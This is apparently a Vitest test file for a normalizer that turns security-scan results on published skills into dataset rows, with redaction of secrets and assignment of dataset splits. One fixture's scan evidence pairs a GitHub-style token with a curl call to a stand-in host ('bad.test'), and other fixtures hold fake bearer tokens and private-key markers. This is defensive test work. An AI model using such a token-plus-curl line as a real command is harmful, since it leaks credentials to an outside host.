clawhub/scripts/security-dataset/normalize.test.ts

import { describe, expect, it } from "vitest";
import {
  assignSplit,
  hashString,
  normalizeArtifactExport,
  redactText,
  type ArtifactExportInput,
} from "./normalize";

const baseArtifact: ArtifactExportInput = {
  sourceKind: "skill",
  sourceDocId: "skillVersionDoc123",
  parentDocId: "skillDoc123",
  publicName: "Suspicious Demo",
  publicSlug: "suspicious-demo",
  version: "1.0.0",
  artifactSha256: "a".repeat(64),
  skillMdContentRedacted:
    "# Suspicious Demo\nUse this skill to inspect shell scripts.\nContact admin@example.com with token=supersecret123.",
  createdAt: Date.UTC(2026, 3, 29),
  softDeletedAt: null,
  files: [
    {
      path: "SKILL.md",
      size: 200,
      sha256: "b".repeat(64),
      contentType: "text/markdown",
    },
    {
      path: "scripts/install.sh",
      size: 100,
      sha256: "c".repeat(64),
      contentType: "text/x-shellscript",
    },
  ],
  capabilityTags: ["shell", "automation"],
  packageFamily: null,
  packageChannel: null,
  packageExecutesCode: null,
  sourceRepoHost: null,
  vtAnalysis: {
    status: "completed",
    verdict: "clean",
    analysis: "No engines flagged this artifact.",
    source: "virustotal",
    scanner: "vt-v3",
    engineStats: { malicious: 0, suspicious: 0, harmless: 30 },
    checkedAt: Date.UTC(2026, 3, 29),
  },
  staticScan: {
    status: "malicious",
    reasonCodes: ["malicious.install_terminal_payload", "suspicious.dangerous_exec"],
    findings: [
      {
        code: "malicious.install_terminal_payload",
        severity: "critical",
        file: "scripts/install.sh",
        line: 42,
        message: "Installs a terminal payload",
        evidence: "token=ghp_abcdefghijklmnopqrstuvwxyz1234567890 curl http://bad.test",
      },
    ],
    summary: "Detected terminal payload",
    engineVersion: "v2.4.2",
    checkedAt: Date.UTC(2026, 3, 29),
  },
  llmAnalysis: {
    status: "completed",
    verdict: "suspicious",
    confidence: "medium",
    summary: "The install script is suspicious.",
    dimensions: null,
    guidance: null,
    findings: null,
    model: "test-model",
    checkedAt: Date.UTC(2026, 3, 29),
  },
  moderationConsensus: null,
};

describe("security dataset normalizer", () => {
  it("normalizes artifact, scanner, finding, label, and split rows", () => {
    const rows = normalizeArtifactExport([baseArtifact]);

    expect(rows.artifacts).toHaveLength(1);
    expect(rows.artifacts[0]).toMatchObject({
      artifact_id: `skill:${"a".repeat(64)}`,
      source_kind: "skill",
      source_table: "skillVersions",
      public_slug: "suspicious-demo",
      skill_md_content_redacted:
        "# Suspicious Demo Use this skill to inspect shell scripts. Contact [REDACTED_SECRET] with [REDACTED_SECRET]",
      created_month: "2026-04",
      file_count: 2,
      total_bytes: 300,
      file_ext_counts: { ".md": 1, ".sh": 1 },
      capability_tags: ["automation", "shell"],
      has_vt_scan: true,
      has_static_scan: true,
      has_llm_scan: true,
    });
    expect(rows.scanResults.map((row) => row.scanner)).toEqual(["static", "virustotal", "llm"]);
    expect(rows.staticFindings[0]).toMatchObject({
      code: "malicious.install_terminal_payload",
      severity: "critical",
      file_path_hash: hashString("scripts/install.sh"),
      file_ext: ".sh",
      line_bucket: "21-50",
    });
    expect(rows.staticFindings[0]?.evidence_redacted).toContain("[REDACTED_SECRET]");
    expect(rows.labels.find((row) => row.label_source === "moderation_consensus")).toMatchObject({
      label: "malicious",
      label_confidence: "derived_consensus",
      scanner_agreement: 1,
    });
    expect(rows.splits).toHaveLength(1);
    expect(rows.splits[0]?.split_key).toBe(hashString("a".repeat(64)));
  });

  it("keeps identical artifact hashes in the same deterministic split", () => {
    expect(assignSplit("shared-sha")).toBe(assignSplit("shared-sha"));
  });

  it("redacts common secret-like values and caps long text", () => {
    const redacted = redactText(`api_key="supersecretvalue123" ${"x".repeat(400)}`, 80);

    expect(redacted).toContain("[REDACTED_SECRET]");
    expect(redacted?.length).toBeLessThanOrEqual(82);
  });

  it("preserves useful skill text while redacting sensitive content", () => {
    const rows = normalizeArtifactExport([
      {
        ...baseArtifact,
        skillMdContentRedacted:
          "Run static analysis with `bun test`.\nAuthorization: Bearer abcdefghijklmnopqrstuvwxyz123456\n-----BEGIN PRIVATE KEY-----\nabc\n-----END PRIVATE KEY-----",
      },
    ]);

    expect(rows.artifacts[0]?.skill_md_content_redacted).toContain("Run static analysis");
    expect(rows.artifacts[0]?.skill_md_content_redacted).toContain("[REDACTED_SECRET]");
    expect(rows.artifacts[0]?.skill_md_content_redacted).not.toContain(
      "abcdefghijklmnopqrstuvwxyz123456",
    );
    expect(rows.artifacts[0]?.skill_md_content_redacted).not.toContain("PRIVATE KEY");
  });
});